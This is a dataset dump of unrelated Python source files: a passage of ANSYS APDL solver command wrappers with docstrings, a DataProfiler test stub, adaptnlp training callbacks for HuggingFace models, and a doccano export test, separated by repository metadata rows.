eigenvalues and eigenvectors, but will often speedup the
computing time of the SNODE eigensolver. The default value of
2.0 has been set as a good blend of accuracy and performance.
The SNODE eigensolver reads the eigenvectors and related
information for each supernode from a file and uses that
information to compute the final eigenvectors. For each
eigenvalue/eigenvector requested by the user, the program must
do one pass through the entire file that contains the
supernode eigenvectors. By choosing a BlockSize value greater
than 1, the program can compute BlockSize number of final
eigenvectors for each pass through the file. Therefore,
smaller values of BlockSize result in more I/O, and larger
values of BlockSize result in less I/O. Larger values of
BlockSize also result in significant additional memory usage,
as BlockSize number of final eigenvectors must be stored in
memory. The default Blocksize of min(NMODE,40) is normally a
good choice to balance memory and I/O usage.
The RobustLev field should only be used when a problem is
detected with the accuracy of the final solution or if the
Supernode eigensolver fails while computing the
eigenvalues/eigenvectors. Setting RobustLev to a value greater
than 0 will cause the performance of the eigensolver to
deteriorate. If the performance deteriorates too much or if
the eigensolver continues to fail when setting the RobustLev
field to higher values, then switching to another eigensolver
such as Block Lanczos or PCG Lanczos is recommended.
Setting Compute = EVALUE causes the Supernode eigensolver to
compute only the requested eigenvalues. During this process a
Jobname.SNODE file is written; however, a Jobname.MODE file is
not written. Thus, errors will likely occur in any downstream
computations that require the Jobname.MODE file (for example,
participation factor computations, mode superpostion
transient/harmonic analysis, PSD analysis). Setting Compute =
EVECTOR causes the Supernode eigensolver to compute only the
corresponding eigenvectors. The Jobname.SNODE file and the
associated Jobname.FULL file are required when requesting
these eigenvectors. In other words, the eigenvalues must have
already been computed for this model before computing the
eigenvectors. This field can be useful in order to separate
the two steps (computing eigenvalues and computing
eigenvectors).
"""
command = (
f"SNOPTION,{rangefact},{blocksize},{robustlev},{compute},,{solve_info}"
)
return self.run(command, **kwargs)
def solve(self, action="", **kwargs):
"""Starts a solution.
APDL Command: SOLVE
Parameters
----------
action
Action to be performed on solve (used only for linear perturbation
analyses).
ELFORM - Reform all appropriate element matrices in the first phase of a linear
perturbation analysis.
Notes
-----
Starts the solution of one load step of a solution sequence based on
the current analysis type and option settings. Use Action = ELFORM only
in the first phase of a linear perturbation analysis.
"""
command = f"SOLVE,{action}"
return self.run(command, **kwargs)
def stabilize(
self, key="", method="", value="", substpopt="", forcelimit="", **kwargs
):
"""Activates stabilization for all elements that support nonlinear
APDL Command: STABILIZE
stabilization.
Parameters
----------
key
Key for controlling nonlinear stabilization:
OFF - Deactivate stabilization. This value is the default.
CONSTANT - Activate stabilization. The energy-dissipation ratio or damping factor remains
constant during the load step.
REDUCE - Activate stabilization. The energy-dissipation ratio or damping factor is
reduced linearly to zero at the end of the load step from
the specified or calculated value.
method
The stabilization-control method:
ENERGY - Use the energy-dissipation ratio as the control. This value is the default
when Key ≠ OFF.
DAMPING - Use the damping factor as the control.
value
The energy-dissipation ratio (Method = ENERGY) or damping factor
(Method = DAMPING). This value must be greater than 0 when Method =
ENERGY or Method = DAMPING. When Method = ENERGY, this value is
usually a number between 0 and 1.
substpopt
Option for the first substep of the load step:
NO - Stabilization is not activated for the first substep even when it does not
converge after the minimal allowed time increment is reached.
This value is the default when Key ≠ OFF.
MINTIME - Stabilization is activated for the first substep if it still does not converge
after the minimal allowed time increment is reached.
ANYTIME - Stabilization is activated for the first substep. Use this option if
stabilization was active for the previous load step via
Key = CONSTANT.
forcelimit
The stabilization force limit coefficient, such that 0 < FORCELIMIT
< 1. The default value is 0.2. To omit a stabilization force check,
set this value to 0.
Notes
-----
Once issued, a STABILIZE command remains in effect until you reissue
the command.
For the energy dissipation ratio, specify VALUE = 1.0e-4 if you have no
prior experience with the current model; if convergence problems are
still an issue, increase the value gradually. The damping factor is
mesh-, material-, and time-step-dependent; an initial reference value
from the previous run (such as a run with the energy-dissipation ratio
as input) should suggest itself.
Exercise caution when specifying SubStpOpt = MINTIME or ANYTIME for the
first load step; ANSYS, Inc. recommends this option only for
experienced users. If stabilization was active for the previous load
step via Key = CONSTANT and convergence is an issue for the first
substep, specify SubStpOpt = ANYTIME.
When the L2-norm of the stabilization force (CSRSS value) exceeds the
L2-norm of the internal force multiplied by the stabilization force
coefficient, ANSYS issues a message displaying both the stabilization
force norm and the internal force norm. The FORCELIMIT argument allows
you to change the default stabilization force coefficient (normally 20
percent).
This command stabilizes the degrees of freedom for current-technology
elements only. Other elements can be included in the FE model, but
their degrees of freedom are not stabilized.
For more information about nonlinear stabilization, see Unstable
Structures in the Structural Analysis Guide. For additional tips that
can help you to achieve a stable final model, see Simplify Your Model
in the Structural Analysis Guide.
"""
command = f"STABILIZE,{key},{method},{value},{substpopt},{forcelimit}"
return self.run(command, **kwargs)
def thexpand(self, key="", **kwargs):
"""Enables or disables thermal loading
APDL Command: THEXPAND
Parameters
----------
key
Activation key:
ON - Thermal loading is included in the load vector (default).
OFF - Thermal loading is not included in the load vector.
Notes
-----
Temperatures applied in the analysis are used by default to evaluate
material properties and contribute to the load vector if the
temperature does not equal the reference temperature and a coefficient
of thermal expansion is specified.
Use THEXPAND,OFF to evaluate the material properties but not contribute
to the load vector. This capability is particularly useful when
performing a harmonic analysis where you do not want to include
harmonically varying thermal loads. It is also useful in a modal
analysis when computing a modal load vector but excluding the thermal
load.
This command is valid for all analysis types except linear perturbation
modal and linear perturbation harmonic analyses. For these two linear
perturbation analysis types, the program internally sets THEXPAND,OFF,
and it cannot be set to ON by using this command (THEXPAND,ON is
ignored).
"""
command = f"THEXPAND,{key}"
return self.run(command, **kwargs)
def thopt(
self,
refopt="",
reformtol="",
ntabpoints="",
tempmin="",
tempmax="",
algo="",
**kwargs,
):
"""Specifies nonlinear transient thermal solution options.
APDL Command: THOPT
Parameters
----------
refopt
Matrix reform option.
FULL - Use the full Newton-Raphson solution option (default). All subsequent input
values are ignored.
QUASI - Use a selective reform solution option based on REFORMTOL.
reformtol
Property change tolerance for Matrix Reformation (.05 default). The
thermal matrices are reformed if the maximum material property
change in an element (from the previous reform time) is greater
than the reform tolerance. Valid only when Refopt = QUASI.
ntabpoints
Number of points in Fast Material Table (64 default). Valid only
when Refopt = QUASI.
tempmin
Minimum temperature for Fast Material Table. Defaults to the
minimum temperature defined by the MPTEMP command for any material
property defined. Valid only when Refopt = QUASI.
tempmax
Maximum temperature for Fast Material Table. Defaults to the
maximum temperature defined by the MPTEMP command for any material
property defined. Valid only when Refopt = QUASI.
--
Reserved field.
algo
Specifies which solution algorithm to apply:
0 - Multipass (default).
1 - Iterative.
Notes
-----
The QUASI matrix reform option is supported by the ICCG, JCG, and
sparse solvers only (EQSLV).
For Refopt = QUASI:
Results from a restart may be different than results from a single run
because the stiffness matrices are always recreated in a restart run,
but may or may not be in a single run (depending on the behavior
resulting from the REFORMTOL setting). Additionally, results may differ
between two single runs as well, if the matrices are reformed as a
result of the REFORMTOL setting.
Midside node temperatures are not calculated if 20-node thermal solid
elements (SOLID90 or SOLID279) are used.
For more information, see Solution Algorithms Used in Transient Thermal
Analysis in the Thermal Analysis Guide.
"""
command = f"THOPT,{refopt},{reformtol},{ntabpoints},{tempmin},{tempmax},{algo}"
return self.run(command, **kwargs)
|
dataprofiler/tests/profilers/test_datatype_column_profiler.py
|
gautomdas/DataProfiler
| 690 |
79549
|
from __future__ import print_function
import os
import unittest
from .test_base_column_profilers import AbstractTestColumnProfiler
from dataprofiler.profilers.column_profile_compilers import \
ColumnPrimitiveTypeProfileCompiler
test_root_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
class TestColumnDataTypeProfiler(AbstractTestColumnProfiler, unittest.TestCase):
column_profiler = ColumnPrimitiveTypeProfileCompiler
profile_types = ['data_type', 'statistics', 'data_type_representation']
def setUp(self):
AbstractTestColumnProfiler.setUp(self)
@classmethod
def setUpClass(cls):
super(TestColumnDataTypeProfiler, cls).setUpClass()
if __name__ == '__main__':
unittest.main()
|
adaptnlp/callback.py
|
chsafouane/adaptnlp
| 410 |
79550
|
<filename>adaptnlp/callback.py<gh_stars>100-1000
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/01_callback.ipynb (unless otherwise specified).
__all__ = ['GatherInputsCallback', 'SetInputsCallback', 'GeneratorCallback']
# Cell
from fastcore.basics import store_attr
from fastcore.meta import delegates
from fastai.callback.core import Callback, CancelBatchException
from transformers import PreTrainedModel
# Cell
class GatherInputsCallback(Callback):
"""
Prepares basic input dictionary for HuggingFace Transformers
This `Callback` generates a very basic dictionary consisting of `input_ids`,
`attention_masks`, and `token_type_ids`, and saves it to the attribute `self.learn.inputs`.
If further data is expected or needed from the batch, the additional Callback(s) should have
an order of -2
"""
order = -3
def before_validate(self):
"""
Sets the number of inputs in `self.dls`
"""
x = self.dl.one_batch()
self.learn.dls.n_inp = len(x)
def before_batch(self):
"""
Turns `self.xb` from a tuple to a dictionary of either
`{"input_ids", "attention_masks", "token_type_ids"}`d
or
`{"input_ids", "attention_masks"}`
"""
inputs = {
"input_ids":self.learn.xb[0],
"attention_mask":self.learn.xb[1]
}
if len(self.learn.xb) > 2:
inputs["token_type_ids"] = self.learn.xb[2]
self.learn.inputs = inputs
# Cell
class SetInputsCallback(Callback):
"""
Callback which runs after `GatherInputsCallback` that sets `self.learn.xb`
"""
order = -1
def __init__(
self,
as_dict=False # Whether to leave `self.xb` as a dictionary of values
): store_attr()
def before_batch(self):
"""
Set `self.learn.xb` to `self.learn.inputs.values()`
"""
if not self.as_dict:
self.learn.xb = list(self.learn.inputs.values())
else:
self.learn.xb = self.learn.inputs
# Cell
class GeneratorCallback(Callback):
"""
Callback used for models that utilize `self.model.generate`
"""
@delegates(PreTrainedModel.generate)
def __init__(
self,
num_beams:int, # Number of beams for beam search
min_length:int, # Minimal length of the sequence generated
max_length:int, # Maximum length of the sequence generated
early_stopping:bool, # Whether to do early stopping
**kwargs
):
store_attr()
self.kwargs = kwargs
def before_batch(self):
"""
Run model-specific inference
"""
pred = self.learn.model.generate(
input_ids = self.xb['input_ids'],
attention_mask = self.xb['attention_mask'],
num_beams = self.num_beams,
min_length = self.min_length,
max_length = self.max_length,
early_stopping = self.early_stopping,
**self.kwargs
)
self.learn.pred = pred
raise CancelBatchException # skip original model inference
|
backend/data_export/tests/test_dataset.py
|
arcada-uas/doccano
| 2,082 |
79570
|
import unittest
from unittest.mock import MagicMock
import pandas as pd
from pandas.testing import assert_frame_equal
from data_export.pipeline.dataset import Dataset
class TestDataset(unittest.TestCase):
def setUp(self):
example = MagicMock()
example.to_dict.return_value = {"data": "example"}
self.examples = MagicMock()
self.examples.__iter__.return_value = [example]
label = MagicMock()
label.find_by.return_value = {"labels": ["label"]}
self.labels = MagicMock()
self.labels.__iter__.return_value = [label]
def test_to_dataframe(self):
dataset = Dataset(self.examples, self.labels)
df = dataset.to_dataframe()
expected = pd.DataFrame([{"data": "example", "labels": ["label"]}])
assert_frame_equal(df, expected)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.